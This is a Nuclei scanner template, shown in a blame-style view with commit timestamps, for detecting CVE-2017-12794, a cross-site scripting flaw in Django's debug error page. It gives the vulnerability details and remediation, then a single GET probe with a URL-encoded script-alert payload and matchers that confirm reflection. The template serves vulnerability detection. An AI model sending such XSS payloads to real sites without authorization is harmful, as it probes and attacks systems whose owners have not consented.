nuclei-templates/http/cves/2017/CVE-2017-12794.yaml

53 lines
1.9 KiB
YAML
Raw Normal View History

2021-06-24 15:49:12 +00:00
id: CVE-2017-12794
info:
name: Django Debug Page - Cross-Site Scripting
2021-06-24 15:49:12 +00:00
author: pikpikcu
severity: medium
description: |
Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible).
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project.
reference:
2021-06-24 15:49:12 +00:00
- https://twitter.com/sec715/status/1406779605055270914
- https://nvd.nist.gov/vuln/detail/CVE-2017-12794
- https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
- http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264
2023-07-15 16:29:17 +00:00
- http://www.securitytracker.com/id/1039264
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-12794
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00219
epss-percentile: 0.59711
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: djangoproject
product: django
tags: xss,django,cve,cve2017
2021-06-24 15:49:12 +00:00
http:
2021-06-24 15:49:12 +00:00
- method: GET
path:
2021-06-29 04:37:07 +00:00
- "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2021-06-24 15:49:12 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-06-24 15:49:12 +00:00
words:
- "<script>alert(document.domain)</script>"
2021-06-29 04:37:07 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-06-29 04:37:07 +00:00
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221009cf2c3fb944242ac8f6afda4cc437dea7ceecc7e98a2a9949c3978169a43a61902201f23d0010c8224c69b0cc6b3e15121d6a5fc30a486ce217928e72ba4952f3e77:922c64590222798bb761d5b6d8e72950